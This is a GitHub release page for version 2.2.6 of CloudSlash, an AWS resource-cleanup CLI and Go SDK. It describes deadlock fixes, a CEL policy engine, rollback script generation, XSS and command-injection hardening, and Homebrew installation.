Skip to content

v2.2.6

Latest
Latest

Choose a tag to compare

View all tags
@github-actions github-actions released this 03 Feb 12:07
· 3 commits to main since this release
v2.2.6
1ddc682

CloudSlash v2.2 Major Update Released

Feature & Stability Release

Overview

CloudSlash v2.2 marks the transition from a standalone CLI tool to a modular infrastructure governance platform. This release prioritizes architectural decoupling, state verification hardening, and integration capabilities for enterprise pipelines.

Key changes include the migration of the core engine to a reusable Go SDK, the introduction of a CEL-based policy engine, and strict "Zero-Drift" verification for the Lazarus Protocol.

New Features

Architecture & SDK

  • Core SDK Decoupling: Migrated internal logic to pkg/engine. CloudSlash now functions as a portable Go library, allowing direct integration into internal provider tools, developer portals (e.g., Backstage), and custom agents. The CLI is now a lightweight consumer of this SDK.
  • Simulation Engine (MockFactory): To build trust in automated decision-making, we have exposed the internal pkg/graph/MockFactory. Users can now programmatically construct hypothetical infrastructure scenarios (e.g., "What if I have 100 detached EBS volumes?") and run the CloudSlash heuristics against them in unit tests, verifying the "Kill Logic" before running it in production.
  • Real-Time Telemetry: Integrated CloudWatch metrics directly into the TUI. Resource details now display 7-day sparklines for CPU and Network utilization to empirically valid idle status before remediation.

Stability & Verification

Stability & Verification (Updated v2.2.6)

Important

Critical Fixes in v2.2.6: This release resolves complex Reader-Writer priority inversion deadlocks that affected high-concurrency scans. Users on v2.2.0-v2.2.5 are strongly urged to upgrade.

  • Deadlock Resolution (v2.2.4, v2.2.6):

    • Fixed a Priority Inversion Deadlock where heuristics re-entrantly acquired Read Locks (RLock) while a Write Lock (Lock) was pending.
    • Re-architected heuristic data access to use direct store reads (g.Store.GetAllNodes) within critical sections, preventing the engine from freezing during mock and live scans.
    • Components fixed: AgedAMIHeuristic, ElasticIPHeuristic, UnattachedVolumeHeuristic, GhostNodeGroupHeuristic.
    • Distribution: Finalized documentation and release artifacts.

  • CI Artifact Reliability (v2.2.5):

    • Fixed an issue where CI pipelines checking for report.html would fail mock scans. The pipeline now deterministically generates all required artifacts.

  • Lazarus Protocol Hardening: Updated the restoration engine ("Undo" logic) to utilize Terraform-native verification. Post-restore validation now asserts a 0-exit code from terraform plan to mathematically guarantee zero state drift.

  • Environment Enforcement: Added runtime checks to enforce execution within POSIX-compliant environments (Linux, macOS, WSL2), preventing undefined behavior on unsupported Windows shells.

Governance & Performance

  • CEL Policy Engine: Replaced static heuristics with a dynamic Common Expression Language (CEL) engine. Users can now define custom waste policies via YAML configuration (e.g., resource.cost > 500 && resource.tag['Env'] == 'Dev').
  • Local Pricing Cache: Implemented a persistent local cache for AWS Pricing API data with a 15-day TTL. This eliminates redundant network calls, reducing subsequent scan times to sub-second latency.

Operational Safety

  • Automated Rollback Generation: Remediation operations now generate a paired undo_cleanup.sh script. This artifact contains the precise commands to reverse specific actions, such as re-attaching Elastic IPs or re-provisioning Security Groups.
  • CI/CD "Strict Mode": Introduced the --strict flag. This forces the CLI to return a non-zero exit code (2) upon detecting partial API failures or policy violations, enabling "Fail-Closed" behavior for compliance pipelines.

Security Improvements

  • XSS Mitigation: Hardened HTML reporting engine. Resource IDs and chart data are now strictly marshaled via encoding/json to prevent Cross-Site Scripting vectors.
  • Injection Defense: Implemented strict regex allow-listing (^[a-zA-Z0-9._/-]+$) for all inputs used in shell script generation to prevent command injection.

Distribution & UX

  • Homebrew Support: Official Homebrew tap is now available. 
    brew install drskyle/tap/cloudslash
  • Sudo-Aware Updates: Resolved issues where cloudslash update hung on interactive password prompts when writing to protected directories (/usr/local/bin).

Repository: https://github.com/DrSkyle/CloudSlash

Assets 7
Loading